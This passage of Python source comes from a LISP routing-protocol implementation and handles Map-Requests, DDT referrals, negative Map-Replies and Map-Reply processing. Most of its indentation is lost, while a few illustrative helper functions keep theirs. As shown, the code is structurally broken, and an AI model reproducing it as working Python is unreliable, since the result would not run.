eid_str = lisp_print_eid_tuple(eid, group)
itr_rloc = map_request.itr_rlocs[0]
xtr_id = map_request.xtr_id
nonce = map_request.nonce
action = LISP_NO_ACTION
pubsub = map_request.subscribe_bit
#
# Check if we are verifying Map-Request signatures. If so, do a mapping
# database lookup on the source-EID to get public-key.
#
sig_good = True
is_crypto_hash = (lisp_get_eid_hash(eid) != None)
if (is_crypto_hash):
sig = map_request.map_request_signature
if (sig == None):
sig_good = False
lprint(("EID-crypto-hash signature verification {}, " + \
"no signature found").format(bold("failed", False)))
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("EID-crypto-hash signature verification {}".format(pf))
#endif
#endif
if (pubsub and sig_good == False):
pubsub = False
lprint("Suppress creating pubsub state due to signature failure")
#endif
#
# There are two cases here that need attention. If the Map-Request was
# an IPv6 Map-Request but the ECM came to us in a IPv4 packet, we need
# to return the Map-Reply in IPv4. And if the Map-Request came to us
# through a NAT, sending the Map-Reply to the Map-Request port won't
# get translated by the NAT. So we have to return the Map-Reply to the
# ECM port. Hopefully, the RTR is listening on the ECM port and using
# the Map-Request port as the ECM port as well. This is typically only
    # a problem on the RTR, when behind a NAT. For an ITR, it usually
# doesn't send Map-Requests since NAT-traversal logic installs default
# map-cache entries.
#
reply_dest = itr_rloc if (itr_rloc.afi == ecm_source.afi) else ecm_source
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None or site_eid.is_star_g()):
notfound = bold("Site not found", False)
lprint("{} for requested EID {}".format(notfound,
green(eid_str, False)))
#
# Send negative Map-Reply with TTL 15 minutes.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, 15, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_SITE_NOT_FOUND])
#endif
prefix_str = site_eid.print_eid_tuple()
site_name = site_eid.site.site_name
#
    # If the request is for a non Crypto-EID, signatures are configured to
    # be required, and no signature is in the Map-Request, bail.
#
if (is_crypto_hash == False and site_eid.require_signature):
sig = map_request.map_request_signature
sig_eid = map_request.signature_eid
if (sig == None or sig_eid.is_null()):
lprint("Signature required for site {}".format(site_name))
sig_good = False
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("Required signature verification {}".format(pf))
#endif
#endif
#
# Check if site-eid is registered.
#
if (sig_good and site_eid.registered == False):
lprint("Site '{}' with EID-prefix {} is not registered for EID {}". \
format(site_name, green(prefix_str, False), green(eid_str, False)))
#
        # We do not want to return a coarser EID-prefix to the Map-Resolver.
        # The accept-more-specifics (AMS) site entry may be one.
#
if (site_eid.accept_more_specifics == False):
eid = site_eid.eid
group = site_eid.group
#endif
#
# Send forced-TTLs even for native-forward entries.
#
ttl = 1
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Send negative Map-Reply with TTL 1 minute.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, ttl, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_MS_NOT_REG])
#endif
#
# Should we proxy-reply?
#
nat = False
pr_str = ""
check_policy = False
if (site_eid.force_nat_proxy_reply):
pr_str = ", nat-forced"
nat = True
check_policy = True
elif (site_eid.force_proxy_reply):
pr_str = ", forced"
check_policy = True
elif (site_eid.proxy_reply_requested):
pr_str = ", requested"
check_policy = True
elif (map_request.pitr_bit and site_eid.pitr_proxy_reply_drop):
pr_str = ", drop-to-pitr"
action = LISP_DROP_ACTION
elif (site_eid.proxy_reply_action != ""):
action = site_eid.proxy_reply_action
pr_str = ", forced, action {}".format(action)
action = LISP_DROP_ACTION if (action == "drop") else \
LISP_NATIVE_FORWARD_ACTION
#endif
#
# Apply policy to determine if we send a negative map-reply with action
# "policy-denied" or we send a map-reply with the policy set parameters.
#
policy_drop = False
policy = None
if (check_policy and lisp_policies.has_key(site_eid.policy)):
p = lisp_policies[site_eid.policy]
if (p.match_policy_map_request(map_request, mr_source)): policy = p
if (policy):
ps = bold("matched", False)
lprint("Map-Request {} policy '{}', set-action '{}'".format(ps,
p.policy_name, p.set_action))
else:
ps = bold("no match", False)
lprint("Map-Request {} for policy '{}', implied drop".format(ps,
p.policy_name))
policy_drop = True
#endif
#endif
if (pr_str != ""):
lprint("Proxy-replying for EID {}, found site '{}' EID-prefix {}{}". \
format(green(eid_str, False), site_name, green(prefix_str, False),
pr_str))
rloc_set = site_eid.registered_rlocs
ttl = 1440
if (nat):
if (site_eid.site_id != 0):
seid = map_request.source_eid
rloc_set = lisp_get_private_rloc_set(site_eid, seid, group)
#endif
if (rloc_set == site_eid.registered_rlocs):
m = (site_eid.group.is_null() == False)
new_set = lisp_get_partial_rloc_set(rloc_set, reply_dest, m)
if (new_set != rloc_set):
ttl = 15
rloc_set = new_set
#endif
#endif
#endif
#
# Force TTL if configured. To denote seconds in TTL field of EID-record
# set high-order bit in ttl value.
#
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
        # Does policy say what the TTL should be? And whether we should drop
        # the Map-Request and return a negative Map-Reply.
#
if (policy):
if (policy.set_record_ttl):
ttl = policy.set_record_ttl
lprint("Policy set-record-ttl to {}".format(ttl))
#endif
if (policy.set_action == "drop"):
lprint("Policy set-action drop, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
else:
rloc = policy.set_policy_map_reply()
if (rloc): rloc_set = [rloc]
#endif
#endif
if (policy_drop):
lprint("Implied drop action, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
#endif
enc = site_eid.echo_nonce_capable
#
# Don't tell spoofer any prefix information about the target EID.
#
if (sig_good):
reply_eid = site_eid.eid
reply_group = site_eid.group
else:
reply_eid = eid
reply_group = group
action = LISP_AUTH_FAILURE_ACTION
rloc_set = []
#endif
#
# If this Map-Request is also a subscription request, return same
# information in a Map-Notify.
#
packet = lisp_build_map_reply(reply_eid, reply_group, rloc_set,
nonce, action, ttl, map_request, None, enc, False)
if (pubsub):
lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc,
mr_sport, nonce, ttl, xtr_id)
else:
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, mr_sport)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# If there are no registered RLOCs, return.
#
rloc_count = len(site_eid.registered_rlocs)
if (rloc_count == 0):
lprint("Requested EID {} found site '{}' with EID-prefix {} with " + \
"no registered RLOCs".format(green(eid_str, False), site_name,
green(prefix_str, False)))
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# Forward to ETR at registered site. We have to put in an ECM.
#
hash_address = map_request.target_eid if map_request.source_eid.is_null() \
else map_request.source_eid
hashval = map_request.target_eid.hash_address(hash_address)
hashval %= rloc_count
etr = site_eid.registered_rlocs[hashval]
if (etr.rloc.is_null()):
lprint(("Suppress forwarding Map-Request for EID {} at site '{}' " + \
"EID-prefix {}, no RLOC address").format(green(eid_str, False),
site_name, green(prefix_str, False)))
else:
lprint(("Forwarding Map-Request for EID {} to ETR {} at site '{}' " + \
"EID-prefix {}").format(green(eid_str, False),
red(etr.rloc.print_address(), False), site_name,
green(prefix_str, False)))
#
# Send ECM.
#
lisp_send_ecm(lisp_sockets, packet, map_request.source_eid, mr_sport,
map_request.target_eid, etr.rloc, to_etr=True)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#enddef
#
# lisp_ddt_process_map_request
#
# Do DDT-node processing of a Map-Request received from an Map-Resolver.
#
def lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source, port):
#
# Lookup target EID address in DDT cache.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
nonce = map_request.nonce
action = LISP_DDT_ACTION_NULL
#
# First check to see if EID is registered locally if we are a Map-Server.
# Otherwise, do DDT lookup.
#
ddt_entry = None
if (lisp_i_am_ms):
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None): return
if (site_eid.registered):
action = LISP_DDT_ACTION_MS_ACK
ttl = 1440
else:
eid, group, action = lisp_ms_compute_neg_prefix(eid, group)
action = LISP_DDT_ACTION_MS_NOT_REG
ttl = 1
#endif
else:
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry == None):
action = LISP_DDT_ACTION_NOT_AUTH
ttl = 0
lprint("DDT delegation entry not found for EID {}".format( \
green(eid_str, False)))
elif (ddt_entry.is_auth_prefix()):
#
# Check auth-prefix. That means there are no referrals.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE
ttl = 15
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint(("DDT delegation entry not found but auth-prefix {} " + \
"found for EID {}").format(ddt_entry_str,
green(eid_str, False)))
if (group.is_null()):
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
lisp_ddt_cache)
else:
group = lisp_ddt_compute_neg_prefix(group, ddt_entry,
lisp_ddt_cache)
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
ddt_entry.source_cache)
#endif
ddt_entry = None
else:
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint("DDT delegation entry {} found for EID {}".format( \
ddt_entry_str, green(eid_str, False)))
ttl = 1440
#endif
#endif
#
# Build and return a Map-Referral message to the source of the Map-Request.
#
packet = lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce)
nonce = map_request.nonce >> 32
if (map_request.nonce != 0 and nonce != 0xdfdf0e1d): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_find_negative_mask_len
#
# XOR the two addresses so we can find the first bit that is different. Then
# count the number of bits from the left that bit position is. That is the
# new mask-length. Compare to the neg-prefix mask-length we have found so
# far. If the new one is longer than the stored one so far, replace it.
#
# This function assumes the address size and the address-family are the same
# for 'eid' and 'entry_prefix'. Caller must make sure of that.
#
def lisp_find_negative_mask_len(eid, entry_prefix, neg_prefix):
diff_address = eid.hash_address(entry_prefix)
address_size = eid.addr_length() * 8
mask_len = 0
#
# The first set bit is the one that is different.
#
for mask_len in range(address_size):
bit_test = 1 << (address_size - mask_len - 1)
if (diff_address & bit_test): break
#endfor
if (mask_len > neg_prefix.mask_len): neg_prefix.mask_len = mask_len
return
#enddef
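#
# Worked example (comment only, hypothetical IPv4 prefixes): for EID 10.1.0.0
# and entry-prefix 10.2.0.0 the XOR is 0x00030000; the first differing bit is
# at position 14 (counting from the high-order bit at position 0), so the
# computed negative-prefix mask-length is 14.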
#
# lisp_neg_prefix_walk
#
# Callback routine to decide which prefixes should be considered by function
# lisp_find_negative_mask_len().
#
# 'entry' in this routine could be a lisp_ddt_entry() or a lisp_site_eid().
#
def lisp_neg_prefix_walk(entry, parms):
eid, auth_prefix, neg_prefix = parms
if (auth_prefix == None):
if (entry.eid.instance_id != eid.instance_id):
return([True, parms])
#endif
if (entry.eid.afi != eid.afi): return([True, parms])
else:
if (entry.eid.is_more_specific(auth_prefix) == False):
return([True, parms])
#endif
#endif
#
# Find bits that match.
#
lisp_find_negative_mask_len(eid, entry.eid, neg_prefix)
return([True, parms])
#enddef
#
# lisp_ddt_compute_neg_prefix
#
# Walk the DDT cache to compute the least specific prefix within the auth-
# prefix found.
#
def lisp_ddt_compute_neg_prefix(eid, ddt_entry, cache):
#
# Do not compute negative prefixes for distinguished-names or geo-prefixes.
#
if (eid.is_binary() == False): return(eid)
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
auth_prefix_str = ddt_entry.print_eid_tuple()
auth_prefix = ddt_entry.eid
#
# Walk looking for the shortest prefix that does NOT match any configured
# site EIDs.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from ddt-cache for EID {} " + \
"using auth-prefix {} is {}").format(green(eid.print_address(), False),
auth_prefix_str, neg_prefix.print_prefix()))
return(neg_prefix)
#enddef
#
# lisp_ms_compute_neg_prefix
#
# From the site cache and the DDT cache, compute a negative EID-prefix that
# is no shorter than a configured authoritative-prefix.
#
def lisp_ms_compute_neg_prefix(eid, group):
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
gneg_prefix = lisp_address(group.afi, "", 0, 0)
gneg_prefix.copy_address(group)
gneg_prefix.mask_len = 0
auth_prefix = None
#
# Look for auth-prefix in DDT cache. If not found, we return the host-based
# EID in a negative Map-Referral, action not-authoritative.
#
if (group.is_null()):
ddt_entry = lisp_ddt_cache.lookup_cache(eid, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
cache = lisp_sites_by_eid
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.eid
else:
ddt_entry = lisp_ddt_cache.lookup_cache(group, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.group
group, auth_prefix, gneg_prefix = lisp_sites_by_eid.walk_cache( \
lisp_neg_prefix_walk, (group, auth_prefix, gneg_prefix))
gneg_prefix.mask_address(gneg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for " + \
"group EID {} using auth-prefix {} is {}").format( \
group.print_address(), auth_prefix.print_prefix() if \
(auth_prefix != None) else "'not found'",
gneg_prefix.print_prefix()))
cache = ddt_entry.source_cache
#endif
#
# Return the auth-prefix if we found it in the DDT cache.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE if (auth_prefix != None) else \
LISP_DDT_ACTION_NOT_AUTH
#
# Walk looking for the shortest prefix that does NOT match any configured
# site EIDs.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for EID {} " + \
"using auth-prefix {} is {}").format( \
green(eid.print_address(), False),
auth_prefix.print_prefix() if (auth_prefix != None) else \
"'not found'", neg_prefix.print_prefix()))
return([neg_prefix, gneg_prefix, action])
#enddef
#
# lisp_ms_send_map_referral
#
# This function is for a Map-Server to send a Map-Referral to a requesting
# node.
#
def lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source, port,
action, eid_prefix, group_prefix):
eid = map_request.target_eid
group = map_request.target_group
nonce = map_request.nonce
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
#
# Build Map-Server specific Map-Referral.
#
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
incomplete = False
#
# Figure out what action code, EID-prefix, and ttl to return in the EID-
# record. Temporarily return the requested prefix until we have
# lisp_ms_compute_neg_prefix() working.
#
if (action == LISP_DDT_ACTION_SITE_NOT_FOUND):
eid_prefix, group_prefix, action = lisp_ms_compute_neg_prefix(eid,
group)
ttl = 15
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG): ttl = 1
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
if (action == LISP_DDT_ACTION_DELEGATION_HOLE): ttl = 15
if (action == LISP_DDT_ACTION_NOT_AUTH): ttl = 0
is_ms_peer = False
rloc_count = 0
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry != None):
rloc_count = len(ddt_entry.delegation_set)
is_ms_peer = ddt_entry.is_ms_peer_entry()
ddt_entry.map_referrals_sent += 1
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (is_ms_peer == False)
#endif
#
# Store info in EID-record.
#
eid_record = lisp_eid_record()
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.eid = eid_prefix
eid_record.group = group_prefix
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
#
# Build referral-set.
#
if (rloc_count != 0):
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#endif
#
# Build packet and send Map-Referral message to the source of the
# Map-Request.
#
if (map_request.nonce != 0): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_send_negative_map_reply
#
# Send a negative Map-Reply. This is one with a specific action code and zero
# RLOCs in the locator-set.
#
def lisp_send_negative_map_reply(sockets, eid, group, nonce, dest, port, ttl,
xtr_id, pubsub):
lprint("Build negative Map-Reply EID-prefix {}, nonce 0x{} to ITR {}". \
format(lisp_print_eid_tuple(eid, group), lisp_hex_string(nonce),
red(dest.print_address(), False)))
action = LISP_NATIVE_FORWARD_ACTION if group.is_null() else \
LISP_DROP_ACTION
#
# If this is a crypto-EID, return LISP_SEND_MAP_REQUEST_ACTION.
#
if (lisp_get_eid_hash(eid) != None):
action = LISP_SEND_MAP_REQUEST_ACTION
#endif
packet = lisp_build_map_reply(eid, group, [], nonce, action, ttl, None,
None, False, False)
#
# Send Map-Notify if this Map-Request is a subscribe-request.
#
if (pubsub):
lisp_process_pubsub(sockets, packet, eid, dest, port, nonce, ttl,
xtr_id)
else:
lisp_send_map_reply(sockets, packet, dest, port)
#endif
return
#enddef
#
# lisp_retransmit_ddt_map_request
#
# Have the Map-Resolver retransmit a DDT Map-Request.
#
def lisp_retransmit_ddt_map_request(mr):
seid_str = mr.mr_source.print_address()
deid_str = mr.print_eid_tuple()
nonce = mr.nonce
#
# Get the referral-node we sent the Map-Request to last time. We need
# to increment its no-response counter.
#
if (mr.last_request_sent_to):
last_node = mr.last_request_sent_to.print_address()
ref = lisp_referral_cache_lookup(mr.last_cached_prefix[0],
mr.last_cached_prefix[1], True)
if (ref and ref.referral_set.has_key(last_node)):
ref.referral_set[last_node].no_responses += 1
#endif
#endif
#
# Did we reach the max number of retries? We are giving up since no
# Map-Referrals have been received.
#
if (mr.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("DDT Map-Request retry limit reached for EID {}, nonce 0x{}". \
format(green(deid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
mr.retry_count += 1
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Retransmit DDT {} from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format(bold("Map-Request", False), "P" if mr.from_pitr else "",
red(mr.itr.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Do referral lookup and send the DDT Map-Request again.
#
lisp_send_ddt_map_request(mr, False)
#
# Restart retransmit timer.
#
mr.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [mr])
mr.retransmit_timer.start()
return
#enddef
#
# lisp_get_referral_node
#
# Get a referral-node of highest priority that is in the up state. Returns
# class lisp_referral_node().
#
def lisp_get_referral_node(referral, source_eid, dest_eid):
#
# Build list of high-priority up referral-nodes.
#
ref_set = []
for ref_node in referral.referral_set.values():
if (ref_node.updown == False): continue
if (len(ref_set) == 0 or ref_set[0].priority == ref_node.priority):
ref_set.append(ref_node)
elif (ref_set[0].priority > ref_node.priority):
ref_set = []
ref_set.append(ref_node)
#endif
#endfor
ref_count = len(ref_set)
if (ref_count == 0): return(None)
hashval = dest_eid.hash_address(source_eid)
hashval = hashval % ref_count
return(ref_set[hashval])
#enddef
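#
# A minimal standalone sketch of the selection logic above, using
# (updown, priority, name) tuples as illustrative stand-ins for
# lisp_referral_node(). Keep only the best-priority up nodes, then pick
# one deterministically with a caller-supplied hash value so the same
# source/destination pair always lands on the same node.
#
def lisp_example_pick_referral(nodes, hashval):
    best = []
    for node in nodes:
        updown, priority, name = node
        if (updown == False): continue
        if (len(best) == 0 or best[0][1] == priority):
            best.append(node)
        elif (best[0][1] > priority):
            best = [node]
        #endif
    #endfor
    if (len(best) == 0): return(None)
    return(best[hashval % len(best)][2])
#enddef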
#
# lisp_send_ddt_map_request
#
# Send a DDT Map-Request based on an EID lookup in the referral cache.
#
def lisp_send_ddt_map_request(mr, send_to_root):
lisp_sockets = mr.lisp_sockets
nonce = mr.nonce
itr = mr.itr
mr_source = mr.mr_source
eid_str = mr.print_eid_tuple()
#
# Check if the maximum allowable Map-Requests have been sent for this
# map-request-queue entry.
#
if (mr.send_count == 8):
lprint("Giving up on map-request-queue entry {}, nonce 0x{}".format( \
green(eid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
#
# If the caller wants us to use the root versus a best-match lookup. We
# only do this once per Map-Request queue entry.
#
if (send_to_root):
lookup_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
lookup_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
mr.tried_root = True
lprint("Jumping up to root for EID {}".format(green(eid_str, False)))
else:
lookup_eid = mr.eid
lookup_group = mr.group
#endif
#
# Do longest match on EID into DDT referral cache.
#
referral = lisp_referral_cache_lookup(lookup_eid, lookup_group, False)
if (referral == None):
lprint("No referral cache entry found")
lisp_send_negative_map_reply(lisp_sockets, lookup_eid, lookup_group,
nonce, itr, mr.sport, 15, None, False)
return
#endif
ref_str = referral.print_eid_tuple()
lprint("Found referral cache entry {}, referral-type: {}".format(ref_str,
referral.print_referral_type()))
ref_node = lisp_get_referral_node(referral, mr_source, mr.eid)
if (ref_node == None):
lprint("No reachable referral-nodes found")
mr.dequeue_map_request()
lisp_send_negative_map_reply(lisp_sockets, referral.eid,
referral.group, nonce, itr, mr.sport, 1, None, False)
return
#endif
lprint("Send DDT Map-Request to {} {} for EID {}, nonce 0x{}". \
format(ref_node.referral_address.print_address(),
referral.print_referral_type(), green(eid_str, False),
lisp_hex_string(nonce)))
#
# Encapsulate Map-Request and send out.
#
to_ms = (referral.referral_type == LISP_DDT_ACTION_MS_REFERRAL or
referral.referral_type == LISP_DDT_ACTION_MS_ACK)
lisp_send_ecm(lisp_sockets, mr.packet, mr_source, mr.sport, mr.eid,
ref_node.referral_address, to_ms=to_ms, ddt=True)
#
# Do some stats.
#
mr.last_request_sent_to = ref_node.referral_address
mr.last_sent = lisp_get_timestamp()
mr.send_count += 1
ref_node.map_requests_sent += 1
return
#enddef
#
# lisp_mr_process_map_request
#
# Process a Map-Request received by a Map-Resolver. We need to forward this
# Map-Request to the longest-match referral from the referral-cache.
#
def lisp_mr_process_map_request(lisp_sockets, packet, map_request, ecm_source,
sport, mr_source):
eid = map_request.target_eid
group = map_request.target_group
deid_str = map_request.print_eid_tuple()
seid_str = mr_source.print_address()
nonce = map_request.nonce
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Received Map-Request from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format("P" if map_request.pitr_bit else "",
red(ecm_source.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Queue the Map-Request. We need to reliably transmit it.
#
mr = lisp_ddt_map_request(lisp_sockets, packet, eid, group, nonce)
mr.packet = packet
mr.itr = ecm_source
mr.mr_source = mr_source
mr.sport = sport
mr.from_pitr = map_request.pitr_bit
mr.queue_map_request()
lisp_send_ddt_map_request(mr, False)
return
#enddef
#
# lisp_process_map_request
#
# Process received Map-Request as a Map-Server or an ETR.
#
def lisp_process_map_request(lisp_sockets, packet, ecm_source, ecm_port,
mr_source, mr_port, ddt_request, ttl, timestamp):
orig_packet = packet
map_request = lisp_map_request()
packet = map_request.decode(packet, mr_source, mr_port)
if (packet == None):
lprint("Could not decode Map-Request packet")
return
#endif
map_request.print_map_request()
#
# If RLOC-probe request, process separately.
#
if (map_request.rloc_probe):
lisp_process_rloc_probe_request(lisp_sockets, map_request, mr_source,
mr_port, ttl, timestamp)
return
#endif
#
# Process SMR.
#
if (map_request.smr_bit):
lisp_process_smr(map_request)
#endif
#
# Process SMR-invoked Map-Request.
#
if (map_request.smr_invoked_bit):
lisp_process_smr_invoked_request(map_request)
#endif
#
# Do ETR processing of the Map-Request if we found a database-mapping.
#
if (lisp_i_am_etr):
lisp_etr_process_map_request(lisp_sockets, map_request, mr_source,
mr_port, ttl, timestamp)
#endif
#
# Do Map-Server processing of the Map-Request.
#
if (lisp_i_am_ms):
packet = orig_packet
eid, group, ddt_action = lisp_ms_process_map_request(lisp_sockets,
orig_packet, map_request, mr_source, mr_port, ecm_source)
if (ddt_request):
lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source,
ecm_port, ddt_action, eid, group)
#endif
return
#endif
#
# Map-Request is from an ITR destined to a Map-Resolver.
#
if (lisp_i_am_mr and not ddt_request):
lisp_mr_process_map_request(lisp_sockets, orig_packet, map_request,
ecm_source, mr_port, mr_source)
#endif
#
# Do DDT-node processing of the Map-Request.
#
if (lisp_i_am_ddt or ddt_request):
packet = orig_packet
lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source,
ecm_port)
#endif
return
#enddef
#
# lisp_store_mr_stats
#
# Store counter and timing stats for the map-resolver that just sent us a
# negative Map-Reply.
#
def lisp_store_mr_stats(source, nonce):
mr = lisp_get_map_resolver(source, None)
if (mr == None): return
#
# Count and record timestamp.
#
mr.neg_map_replies_received += 1
mr.last_reply = lisp_get_timestamp()
#
# For every 100 replies, reset the total_rtt so we can get a new average.
#
if ((mr.neg_map_replies_received % 100) == 0): mr.total_rtt = 0
#
# If Map-Reply matches stored nonce, then we can do an RTT calculation.
#
if (mr.last_nonce == nonce):
mr.total_rtt += (time.time() - mr.last_used)
mr.last_nonce = 0
#endif
if ((mr.neg_map_replies_received % 10) == 0): mr.last_nonce = 0
return
#enddef
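#
# A hedged sketch of how the stats kept above could be reported. Average
# RTT is total_rtt divided by the number of replies since the last
# 100-reply reset. The attribute names mirror the ones used above; the
# function itself is illustrative and not called anywhere in this file.
#
def lisp_example_average_mr_rtt(mr):
    replies = mr.neg_map_replies_received % 100
    if (replies == 0): return(0)
    return(mr.total_rtt / replies)
#enddef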
#
# lisp_process_map_reply
#
# Process received Map-Reply.
#
def lisp_process_map_reply(lisp_sockets, packet, source, ttl, itr_in_ts):
global lisp_map_cache
map_reply = lisp_map_reply()
packet = map_reply.decode(packet)
if (packet == None):
lprint("Could not decode Map-Reply packet")
return
#endif
map_reply.print_map_reply()
#
# Process each EID record in Map-Reply message.
#
rloc_key_change = None
for i in range(map_reply.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Reply packet")
return
#endif
eid_record.print_record(" ", False)
#
# If this is a negative Map-Reply, see if it came from a Map-Resolver and
# do some counting and timing stats.
#
if (eid_record.rloc_count == 0):
lisp_store_mr_stats(source, map_reply.nonce)
#endif
multicast = (eid_record.group.is_null() == False)
#
# If this is a (0.0.0.0/0, G) with drop-action, we don't want to
# cache a more-specific (S,G) entry. It is a startup timing problem.
#
if (lisp_decent_push_configured):
action = eid_record.action
if (multicast and action == LISP_DROP_ACTION):
if (eid_record.eid.is_local()): continue
#endif
#endif
#
# Some RLOC-probe Map-Replies may have no EID value in the EID-record.
# Like from RTRs or PETRs.
#
if (multicast == False and eid_record.eid.is_null()): continue
#
# Do not lose state for other RLOCs that may be stored in an already
# cached map-cache entry.
#
if (multicast):
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
else:
mc = lisp_map_cache.lookup_cache(eid_record.eid, True)
#endif
new_mc = (mc == None)
#
# Do not let map-cache entries from Map-Replies override gleaned
# entries.
#
if (mc == None):
glean, x, y = lisp_allow_gleaning(eid_record.eid, eid_record.group,
None)
if (glean): continue
else:
if (mc.gleaned): continue
#endif
#
# Process each RLOC record in EID record.
#
rloc_set = []
mrloc = None
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
rloc_record.keys = map_reply.keys
packet = rloc_record.decode(packet, map_reply.nonce)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Reply packet")
return
#endif
rloc_record.print_record(" ")
old_rloc = None
if (mc): old_rloc = mc.get_rloc(rloc_record.rloc)
if (old_rloc):
rloc = old_rloc
else:
rloc = lisp_rloc()
#endif
#
# Copy RLOC data from record, add to locator-set. Check to see
# if the RLOC has been translated by a NAT. If so, go get the
# translated port and store in rloc entry.
#
port = rloc.store_rloc_from_record(rloc_record, map_reply.nonce,
source)
rloc.echo_nonce_capable = map_reply.echo_nonce_capable
if (rloc.echo_nonce_capable):
addr_str = rloc.rloc.print_address_no_iid()
